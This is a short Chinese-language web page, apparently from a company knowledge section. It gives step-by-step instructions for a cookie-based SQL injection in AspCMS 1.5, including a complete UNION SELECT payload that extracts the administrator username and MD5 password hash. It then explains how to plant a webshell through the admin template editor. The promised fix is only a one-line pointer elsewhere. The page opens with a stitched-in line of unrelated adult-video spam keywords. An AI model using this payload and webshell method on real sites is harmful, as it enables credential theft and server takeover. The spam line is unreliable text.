久艹视频免费看,亚洲成av人综合在线观看,51久久夜色精品国产水果派解说,gogo全球大胆高清人体444

知識學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識學(xué)堂 > 常見技術(shù)問題
Aspcms 1.5 COOKIES注入0day及修復(fù)
更新時間:2011-12-09 | 發(fā)布人:本站 | 點擊率:1195
Aspcms 1.5 COOKIES注入0day,注冊一個帳號。然后登陸后修改COOKIES的USERID值
 
在后面加上注入語句:
 
UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
 
然后編輯帳號就能看到管理員的帳號和MD5密碼值。
 
后臺拿SHELL:
 
訪問admin/_Style/AspCms_TemplateEdit.asp?filename=tmdsb.asp在里面加一句話或者大馬。
 
保存后SHELL在風(fēng)格目錄下面。Templates/default/html/tmdsb.asp
 
 
 
修復(fù):參考本站cookies注入文章